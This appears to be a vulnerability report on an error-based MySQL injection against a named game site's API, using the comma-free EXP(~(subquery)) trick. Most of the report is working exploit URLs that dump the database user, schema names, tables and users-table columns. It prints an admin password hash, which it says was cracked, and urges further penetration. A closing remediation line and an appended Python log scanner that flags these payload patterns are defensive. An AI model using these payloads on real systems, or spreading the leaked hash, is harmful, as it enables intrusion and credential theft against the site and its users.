17173 MySQL error injection at a game site
Error-based injection through UpdateXML or a duplicate-entry error requires a comma in the payload.
What if the application uses the comma as a separator, or filters it out?
The EXP function can be used to trigger the error instead, and it needs no comma.
http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20user())a))%2b%22bb&t=1425612949962
User: act_admin@10.59.107.127
Next, enumerate the database names:
http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(schema_name)%20from%20INFORMATION_SCHEMA.SCHEMATA)a))%2b%22bb&t=1425612949962
Result (the schema names are run together in the error message):
information_schema, act_auto, act_os_2013, act_os_2014, act_os_2015, activity2010, activity2011, activity2012, activity2013, activity2014, activity2015, activity_manage
List the tables in the activity_manage database:
http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27activity_manage%27)a))%2b%22bb&t=1425612949962
Result (again run together in the error message):
activities, activity_classify, activity_comment, activity_function, activity_join, activity_joinrecord, activity_log, activity_right, users
Then retrieve all columns in the users table:
http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)a))%2b%22bb&t=1425612949962
Result:
user_id, username, passwd, group_id, note, adminid
Then query username and passwd to obtain the admin password hash f00e61dc5e9caadbb3a57fbd95f5f0bd. The actadmin hash is cracked! @ # $ % ^
Because the error message truncates long text, a single query does not return everything; use the limit 10 offset 10 form to page through the rows ten at a time (the output shown here is only part of the content). This form needs no comma, for example:
select group_concat(passwd) from activity_manage.users limit 10 offset 0
At this point all the content of the database can be retrieved. It can be searched for credentials to log in to the admin backend, and the mailbox data used for further penetration such as password cracking.
Remediation suggestions:
Filter and escape all request parameters, especially double quotation marks.
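As an added defender-side example (not part of the original report), the script below scans web access logs for the comma-free EXP(~(subquery)) marker used here, alongside the UpdateXML/ExtractValue and information_schema markers, decoding the query string repeatedly so double-encoded payloads are not missed. The log lines are constructed for the example; only the first request shape mirrors the ShowData payload quoted above.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers of MySQL error-based extraction, including the comma-free
# EXP(~(subquery)) overflow trick this report uses in place of UpdateXML.
ERROR_BASED_PATTERNS = [
    re.compile(r"\bexp\s*\(\s*~\s*\(", re.I),
    re.compile(r"\bupdatexml\s*\(", re.I),
    re.compile(r"\bextractvalue\s*\(", re.I),
    re.compile(r"\bfrom\s+information_schema\.", re.I),
]

def decode_param(value: str) -> str:
    """Percent-decode until stable so double-encoded payloads are seen."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value

def flag_request(url: str) -> list:
    """Return the names of query parameters carrying error-based markers."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if any(p.search(decode_param(value)) for p in ERROR_BASED_PATTERNS):
            hits.append(name)
    return hits

def scan_access_log(lines) -> list:
    """Return (line number, flagged parameters) for combined-log-format lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m:
            hits = flag_request(m.group(1))
            if hits:
                findings.append((n, hits))
    return findings

# Constructed sample log lines (not taken from the original report).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Mar/2015:10:15:49 +0800] "GET /Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20user())a))%2b%22bb&t=1425612949962 HTTP/1.1" 500 512',
    '203.0.113.6 - - [06/Mar/2015:10:15:50 +0800] "GET /Api/ShowData?id=1024&t=1425612949963 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [06/Mar/2015:10:15:52 +0800] "GET /Api/ShowData?id=aa%2522%252bEXP(~(select%201))%252b%2522bb HTTP/1.1" 500 512',
]

if __name__ == "__main__":
    for n, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: suspicious parameter(s) {hits}")
```

A spike of HTTP 500 responses on one endpoint paired with these markers is the signal to alert on; the same check can run on a WAF or reverse proxy before the request reaches the application.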